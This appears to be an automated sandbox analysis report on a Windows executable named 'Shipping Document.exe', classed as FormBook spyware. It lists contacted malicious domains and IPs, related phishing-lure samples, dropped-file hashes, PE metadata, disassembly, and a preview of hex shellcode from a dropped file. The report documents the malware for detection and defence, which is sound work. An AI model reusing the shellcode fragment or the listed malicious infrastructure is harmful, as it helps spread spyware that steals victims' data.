                            https://www.google.comcertreq.exe, 00000004.00000002.3986547187.00000000063DA000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3986547187.00000000066FE000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3986547187.00000000071FC000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3986547187.0000000006D46000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3988300367.00000000083D0000.00000004.00000800.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.00000000048DC000.00000004.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003ABA000.00000004.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000004426000.00000004.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003DDE000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.y94hr.toptvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3987001681.00000000056D8000.00000040.80000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://fasthosts.co.uk/tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003F70000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.fasthosts.co.uk/get-online?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_certreq.exe, 00000004.00000002.3986547187.0000000006890000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3988300367.00000000083D0000.00000004.00000800.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003F70000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcertreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://static.fasthosts.co.uk/icons/favicon.icocertreq.exe, 00000004.00000002.3986547187.0000000006890000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003F70000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.csscertreq.exe, 00000004.00000002.3986547187.0000000006A22000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000004102000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://www.fasthosts.co.uk/contact?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_parcertreq.exe, 00000004.00000002.3986547187.0000000006890000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3988300367.00000000083D0000.00000004.00000800.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003F70000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            91.195.240.92
                            www.pharmacielorraine.frGermany
                            47846SEDO-ASDEtrue
                            185.31.240.240
                            pricekaboom.comEstonia
                            49604ZONEZoneMediaOUEEtrue
                            203.161.43.227
                            www.ziontool.xyzMalaysia
                            45899VNPT-AS-VNVNPTCorpVNtrue
                            160.251.148.118
                            www.busypro.netJapan7506INTERQGMOInternetIncJPtrue
                            142.250.186.51
                            ghs.googlehosted.comUnited States
                            15169GOOGLEUSfalse
                            212.227.172.253
                            www.fruitique.co.ukGermany
                            8560ONEANDONE-ASBrauerstrasse48DEtrue
                            3.33.130.190
                            autonomyai.xyzUnited States
                            8987AMAZONEXPANSIONGBtrue
                            199.59.243.225
                            www.gamemaster.atUnited States
                            395082BODIS-NJUStrue
                            172.67.190.203
                            www.batchscraper.comUnited States
                            13335CLOUDFLARENETUStrue
                            213.171.195.105
                            www.annahaywardva.co.ukUnited Kingdom
                            8560ONEANDONE-ASBrauerstrasse48DEtrue
                            38.47.207.149
                            y94hr.topUnited States
                            174COGENT-174UStrue
                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1447908
                            Start date and time:2024-05-27 12:18:15 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 11m 15s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:12
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:2
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:Shipping Document.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@7/5@16/11
                            EGA Information:
                            • Successful, ratio: 75%
                            HCA Information:
                            • Successful, ratio: 92%
                            • Number of executed functions: 60
                            • Number of non-executed functions: 268
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • Not all processes where analyzed, report is missing behavior information
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            TimeTypeDescription
                            06:20:31API Interceptor10262451x Sleep call for process: certreq.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            91.195.240.92PAYMENT ADVICE.exeGet hashmaliciousFormBookBrowse
                            • www.pharmacielorraine.fr/opfh/
                            Swift_USD103,700.exeGet hashmaliciousFormBookBrowse
                            • www.pharmacielorraine.fr/1mw3/
                            NEW PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                            • www.pharmacielorraine.fr/opfh/
                            URGENT BANK ACCOUNT.exeGet hashmaliciousFormBookBrowse
                            • www.pharmacielorraine.fr/opfh/
                            185.31.240.240PAYMENT ADVICE.exeGet hashmaliciousFormBookBrowse
                            • www.pricekaboom.com/opfh/
                            NEW PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                            • www.pricekaboom.com/opfh/
                            URGENT BANK ACCOUNT.exeGet hashmaliciousFormBookBrowse
                            • www.pricekaboom.com/opfh/
                            New Shipping Documents.exeGet hashmaliciousFormBookBrowse
                            • www.pricekaboom.com/opfh/
                            SHIPMENT ARRIVAL NOTICE.exeGet hashmaliciousFormBookBrowse
                            • www.pricekaboom.com/opfh/
                            203.161.43.227PAYMENT ADVICE.exeGet hashmaliciousFormBookBrowse
                            • www.ziontool.xyz/opfh/
                            USD46k Swift_PDF.exeGet hashmaliciousFormBookBrowse
                            • www.infinixx.info/b96t/
                            NEW PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                            • www.ziontool.xyz/opfh/
                            Lcjfuguruhxhrv.exeGet hashmaliciousDBatLoader, FormBookBrowse
                            • www.shortput.top/g09c/
                            Purchase Order_17052024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • www.shortput.top/05xu/
                            URGENT BANK ACCOUNT.exeGet hashmaliciousFormBookBrowse
                            • www.ziontool.xyz/opfh/
                            Purchase Order_21052024.exeGet hashmaliciousFormBookBrowse
                            • www.shortput.top/05xu/
                            m735YSFaZM.exeGet hashmaliciousFormBookBrowse
                            • www.hellome.buzz/q0r6/
                            nPLN.exeGet hashmaliciousFormBookBrowse
                            • www.shortput.top/05xu/
                            New Shipping Documents.exeGet hashmaliciousFormBookBrowse
                            • www.ziontool.xyz/opfh/
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            www.gamemaster.atPAYMENT ADVICE.exeGet hashmaliciousFormBookBrowse
                            • 199.59.243.225
                            NEW PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                            • 199.59.243.225
                            Transferencia.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 199.59.243.225
                            URGENT BANK ACCOUNT.exeGet hashmaliciousFormBookBrowse
                            • 199.59.243.225
                            New Shipping Documents.exeGet hashmaliciousFormBookBrowse
                            • 199.59.243.225
                            SHIPMENT ARRIVAL NOTICE.exeGet hashmaliciousFormBookBrowse
                            • 199.59.243.225
                            MV SHUHA QUEEN II.exeGet hashmaliciousFormBookBrowse
                            • 199.59.243.225
                            www.annahaywardva.co.ukPAYMENT ADVICE.exeGet hashmaliciousFormBookBrowse
                            • 213.171.195.105
                            NEW PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                            • 213.171.195.105
                            d35g770B2W.exeGet hashmaliciousFormBookBrowse
                            • 213.171.195.105
                            URGENT BANK ACCOUNT.exeGet hashmaliciousFormBookBrowse
                            • 213.171.195.105
                            bin.exeGet hashmaliciousFormBookBrowse
                            • 213.171.195.105
                            New Shipping Documents.exeGet hashmaliciousFormBookBrowse
                            • 213.171.195.105
                            SHIPMENT ARRIVAL NOTICE.exeGet hashmaliciousFormBookBrowse
                            • 213.171.195.105
                            G7DzDN2VcB.exeGet hashmaliciousFormBookBrowse
                            • 213.171.195.105
                            TS-240514-UF2.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 213.171.195.105
                            MV SHUHA QUEEN II.exeGet hashmaliciousFormBookBrowse
                            • 213.171.195.105
                            www.busypro.netPAYMENT ADVICE.exeGet hashmaliciousFormBookBrowse
                            • 160.251.148.118
                            NEW PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                            • 160.251.148.118
                            Transferencia.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 160.251.148.118
                            URGENT BANK ACCOUNT.exeGet hashmaliciousFormBookBrowse
                            • 160.251.148.118
                            New Shipping Documents.exeGet hashmaliciousFormBookBrowse
                            • 160.251.148.118
                            SHIPMENT ARRIVAL NOTICE.exeGet hashmaliciousFormBookBrowse
                            • 160.251.148.118
                            MV SHUHA QUEEN II.exeGet hashmaliciousFormBookBrowse
                            • 160.251.148.118
                            www.pharmacielorraine.frPAYMENT ADVICE.exeGet hashmaliciousFormBookBrowse
                            • 91.195.240.92
                            Swift_USD103,700.exeGet hashmaliciousFormBookBrowse
                            • 91.195.240.92
                            NEW PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                            • 91.195.240.92
                            URGENT BANK ACCOUNT.exeGet hashmaliciousFormBookBrowse
                            • 91.195.240.92
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            SEDO-ASDEPAYMENT ADVICE.exeGet hashmaliciousFormBookBrowse
                            • 91.195.240.92
                            Offer Document 23.lnkGet hashmaliciousFormBookBrowse
                            • 91.195.240.94
                            qtCWL0lgfX.exeGet hashmaliciousFormBookBrowse
                            • 91.195.240.94
                            Offer Document 24.lnkGet hashmaliciousFormBookBrowse
                            • 91.195.240.94
                            Platosammine.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 91.195.240.19
                            FRA.0038222.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 91.195.240.123
                            ShippingDoc_23052024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 91.195.240.19
                            Forfaldendes253.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 91.195.240.123
                            GXu0Ow8T1h.exeGet hashmaliciousFormBookBrowse
                            • 91.195.240.19
                            file.exeGet hashmaliciousCMSBruteBrowse
                            • 91.195.240.12
                            ZONEZoneMediaOUEEPAYMENT ADVICE.exeGet hashmaliciousFormBookBrowse
                            • 185.31.240.240
                            quotation.exeGet hashmaliciousFormBookBrowse
                            • 185.31.240.240
                            Payment invoice.exeGet hashmaliciousFormBookBrowse
                            • 185.31.240.240
                            NEW PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                            • 185.31.240.240
                            quote.exeGet hashmaliciousFormBookBrowse
                            • 185.31.240.240
                            URGENT BANK ACCOUNT.exeGet hashmaliciousFormBookBrowse
                            • 185.31.240.240
                            SecuriteInfo.com.Win32.PWSX-gen.6793.10953.exeGet hashmaliciousFormBookBrowse
                            • 185.31.240.240
                            New Shipping Documents.exeGet hashmaliciousFormBookBrowse
                            • 185.31.240.240
                            SHIPMENT ARRIVAL NOTICE.exeGet hashmaliciousFormBookBrowse
                            • 185.31.240.240
                            bad.jsGet hashmaliciousUnknownBrowse
                            • 217.146.69.54
                            INTERQGMOInternetIncJPPAYMENT ADVICE.exeGet hashmaliciousFormBookBrowse
                            • 160.251.148.118
                            wyZ1vPGwGw.elfGet hashmaliciousUnknownBrowse
                            • 118.27.0.18
                            M2Vf6ASl3g.elfGet hashmaliciousUnknownBrowse
                            • 133.130.112.114
                            j55aXfhPv3.elfGet hashmaliciousMirai, MoobotBrowse
                            • 157.7.79.151
                            file.exeGet hashmaliciousCMSBruteBrowse
                            • 160.251.107.179
                            NEW PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                            • 160.251.148.118
                            Transferencia.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 160.251.148.118
                            URGENT BANK ACCOUNT.exeGet hashmaliciousFormBookBrowse
                            • 160.251.148.118
                            Request for Quotation # 3200025006.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 118.27.122.214
                            RE Draft BL for BK#440019497 REF#388855.exeGet hashmaliciousFormBookBrowse
                            • 118.27.122.214
                            VNPT-AS-VNVNPTCorpVNPAYMENT ADVICE.exeGet hashmaliciousFormBookBrowse
                            • 203.161.43.227
                            RFQ _ARC 101011-24.exeGet hashmaliciousFormBookBrowse
                            • 203.161.49.193
                            URocnz2wNj.elfGet hashmaliciousUnknownBrowse
                            • 113.184.12.157
                            3LI2VAvf26.elfGet hashmaliciousUnknownBrowse
                            • 14.161.21.248
                            h73eD4sruD.elfGet hashmaliciousUnknownBrowse
                            • 14.250.168.229
                            wNJM6XQwaZ.elfGet hashmaliciousUnknownBrowse
                            • 123.30.215.217
                            n4WgIM7VfS.elfGet hashmaliciousMiraiBrowse
                            • 123.17.251.239
                            http://worker-frosty-surf-7141.parvgee90.workers.dev/favicon.icoGet hashmaliciousHTMLPhisherBrowse
                            • 203.161.57.106
                            http://worker-office-onedrive.td5xtn-b1lv7f1ymscd0.workers.dev/favicon.icoGet hashmaliciousHTMLPhisherBrowse
                            • 203.161.57.106
                            6T1S0q3QLa.elfGet hashmaliciousMiraiBrowse
                            • 123.31.16.67
                            No context
                            No context
                            Process:C:\Windows\SysWOW64\certreq.exe
                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                            Category:modified
                            Size (bytes):196608
                            Entropy (8bit):1.1215420383712111
                            Encrypted:false
                            SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                            MD5:9A809AD8B1FDDA60760BB6253358A1DB
                            SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                            SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                            SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\Shipping Document.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):269312
                            Entropy (8bit):7.994088974008671
                            Encrypted:true
                            SSDEEP:6144:LF7WfCm87IIv7qu2t7zWyhp4sF23/TGgUKWZX9fzTAc/5jr:LJWfkOuuXth7O/TjwzJ5jr
                            MD5:A84DEB7D6CE7940B0F03152F0EA11AB6
                            SHA1:627F7CD57B0BDF024D1C6590224A8D8CB8E87B18
                            SHA-256:4114533EACAA451D68D5891A6CBE437183452DC947EB6C1B69DF3D4CBABA291F
                            SHA-512:EB4E91CD76588252DADF9E73985385532E12611F50C240694D5D07119DBDCAF84651EE43A73F369F2A1D432CB47DA818736D3D2C93F9C708F5256E271AD136BE
                            Malicious:false
                            Reputation:low
                            Preview:.b...HX1J..;.....L3...bTY...FTX8UL0HX1JWQI2KFTX8UL0HX1JWQI.KFTV'.B0.Q.k.P..j.<1Ku<B'?C+:q*S%(;,.7).:-_j>?iv..t5W1).EU;nWQI2KFT!9\..(?.w76..+!.B....(?.P....+!.B....(?..>2!.+!.X8UL0HX1..QI~JGT.kn.0HX1JWQI.KDUS9^L0B\1JWQI2KFT(,UL0XX1JwUI2K.TX(UL0JX1LWQI2KFT^8UL0HX1JwUI2IFTX8UL2H..JWAI2[FTX8EL0XX1JWQI"KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTvL04DHX1._UI2[FTX2QL0XX1JWQI2KFTX8UL.HXQJWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1
                            Process:C:\Users\user\Desktop\Shipping Document.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):9906
                            Entropy (8bit):7.596339518487682
                            Encrypted:false
                            SSDEEP:192:eyaFcTokbCKr+mfv76SgtVppx6RAbhBJPIHXnaT+vcYKIl363H+:AFxkeU+m2SgnppURYhBJ+3aCvcYKI2+
                            MD5:4277BAF7B7E83058011EC939759D8E4C
                            SHA1:E4843A2380BDDD6D5C8511845EEE757868FFE189
                            SHA-256:9AB04BC5B9205109CE4DB22C561755A67CE2C76911B09BE4BED78AAAE22ED0D6
                            SHA-512:D2E424E52AACFE2D40CC5E579DD8FEB679D67A04B7B7706E3677CDEE8ADE1A07E661D5A67B537C5A3FC21356CA39FFEEFBA8D15FC3E318560012CB0DA17E5EE7
                            Malicious:false
                            Reputation:low
                            Preview:EA06..t4.M(...aD..fT)..D.Mh.z,.gA....5.......B.Mh..%.mF.Mf....qb.....-..c.L...$.m5...k..c0.M....k8.X.3i...l..%.o2....A8.6,.........3k....e.N&s0.oNf.)...k.K$.eb....5..f.........6.0.o.p....l39....V0...S..$.if...6....f.I...@.....i8........X@.4.1..........$.P...0z.5..$}3Y.....=5..`d....!d..V...7f.[$..8...|.I..W.d...|vI..W.d...|vK..W.d...|vK(.W.e...|vY..W,.O...k.`..X@..9..^.8..F.6.z..G......`......i..G../Z...zqd...l.;.........|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn.
                            Process:C:\Users\user\Desktop\Shipping Document.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):269312
                            Entropy (8bit):7.994088974008671
                            Encrypted:true
                            SSDEEP:6144:LF7WfCm87IIv7qu2t7zWyhp4sF23/TGgUKWZX9fzTAc/5jr:LJWfkOuuXth7O/TjwzJ5jr
                            MD5:A84DEB7D6CE7940B0F03152F0EA11AB6
                            SHA1:627F7CD57B0BDF024D1C6590224A8D8CB8E87B18
                            SHA-256:4114533EACAA451D68D5891A6CBE437183452DC947EB6C1B69DF3D4CBABA291F
                            SHA-512:EB4E91CD76588252DADF9E73985385532E12611F50C240694D5D07119DBDCAF84651EE43A73F369F2A1D432CB47DA818736D3D2C93F9C708F5256E271AD136BE
                            Malicious:false
                            Reputation:low
                            Preview:.b...HX1J..;.....L3...bTY...FTX8UL0HX1JWQI2KFTX8UL0HX1JWQI.KFTV'.B0.Q.k.P..j.<1Ku<B'?C+:q*S%(;,.7).:-_j>?iv..t5W1).EU;nWQI2KFT!9\..(?.w76..+!.B....(?.P....+!.B....(?..>2!.+!.X8UL0HX1..QI~JGT.kn.0HX1JWQI.KDUS9^L0B\1JWQI2KFT(,UL0XX1JwUI2K.TX(UL0JX1LWQI2KFT^8UL0HX1JwUI2IFTX8UL2H..JWAI2[FTX8EL0XX1JWQI"KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTvL04DHX1._UI2[FTX2QL0XX1JWQI2KFTX8UL.HXQJWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1
                            Process:C:\Users\user\Desktop\Shipping Document.exe
                            File Type:ASCII text, with very long lines (29748), with no line terminators
                            Category:modified
                            Size (bytes):29748
                            Entropy (8bit):3.5465806603192185
                            Encrypted:false
                            SSDEEP:768:ViTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbQE+I+h6584vfF3if6gP:ViTZ+2QoioGRk6ZklputwjpjBkCiw2R+
                            MD5:E10F06FD73FB0CC2ED6E02DA9B88FE88
                            SHA1:1E58B338766D9DFE94D0879540AD00F356B70E74
                            SHA-256:3EFE598C6C48F54F7CDCB70BC34E14F2A09E2C6A12B48D991BF98D96F272F422
                            SHA-512:F5918E896F6F2C788A1DCDBEA03161DDE00EC8BD6258A9F86CEEE1C5F449146EBEE48BB00EF4183981A1763AF347EF960D0952787E3F61F7AB1D81735D1C1CC0
                            Malicious:false
                            Reputation:low
                            Preview:84F98E0D192B10FD05E7E43AEF7957D5930866ABD5D0DA6FF50x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffffba6c0000006689957cffffffb86c0000
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.099246803162921
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:Shipping Document.exe
                            File size:1'153'024 bytes
                            MD5:d6e393603c46c4152ea7603ff047af86
                            SHA1:664cfe9fa1b0df9d616d4158bb0b5742e62a1756
                            SHA256:a70008d95ba3e813cd35c1c663aa46c3cf6c95eeaeccbfbdeb18597daec36647
                            SHA512:b6a94caa7f7da85cd3297af6168f9ce4fb50fd52cf9575d47b5f748d205f41f879f6ae4a0d007064a1aeb4e01bfb90c4659f7036cba826e97bfb76428cc69d6a
                            SSDEEP:24576:uAHnh+eWsN3skA4RV1Hom2KXMmHacLoBPr+yZU3BSy5:Zh+ZkldoPK8YacLoxr+yZ+X
                            TLSH:3C35AE0273D1C036FFABA2739B6AF64556BD78254123852F13981DB9BD701B2233E663
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                            Icon Hash:aaf3e3e3938382a0
                            Entrypoint:0x42800a
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x6653C4E1 [Sun May 26 23:25:21 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:afcdf79be1557326c854b6e20cb900a7
                            Instruction
                            call 00007F5F988173DDh
                            jmp 00007F5F9880A194h
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            push edi
                            push esi
                            mov esi, dword ptr [esp+10h]
                            mov ecx, dword ptr [esp+14h]
                            mov edi, dword ptr [esp+0Ch]
                            mov eax, ecx
                            mov edx, ecx
                            add eax, esi
                            cmp edi, esi
                            jbe 00007F5F9880A31Ah
                            cmp edi, eax
                            jc 00007F5F9880A67Eh
                            bt dword ptr [004C41FCh], 01h
                            jnc 00007F5F9880A319h
                            rep movsb
                            jmp 00007F5F9880A62Ch
                            cmp ecx, 00000080h
                            jc 00007F5F9880A4E4h
                            mov eax, edi
                            xor eax, esi
                            test eax, 0000000Fh
                            jne 00007F5F9880A320h
                            bt dword ptr [004BF324h], 01h
                            jc 00007F5F9880A7F0h
                            bt dword ptr [004C41FCh], 00000000h
                            jnc 00007F5F9880A4BDh
                            test edi, 00000003h
                            jne 00007F5F9880A4CEh
                            test esi, 00000003h
                            jne 00007F5F9880A4ADh
                            bt edi, 02h
                            jnc 00007F5F9880A31Fh
                            mov eax, dword ptr [esi]
                            sub ecx, 04h
                            lea esi, dword ptr [esi+04h]
                            mov dword ptr [edi], eax
                            lea edi, dword ptr [edi+04h]
                            bt edi, 03h
                            jnc 00007F5F9880A323h
                            movq xmm1, qword ptr [esi]
                            sub ecx, 08h
                            lea esi, dword ptr [esi+08h]
                            movq qword ptr [edi], xmm1
                            lea edi, dword ptr [edi+08h]
                            test esi, 00000007h
                            je 00007F5F9880A375h
                            bt esi, 03h
                            Programming Language:
                            • [ASM] VS2013 build 21005
                            • [ C ] VS2013 build 21005
                            • [C++] VS2013 build 21005
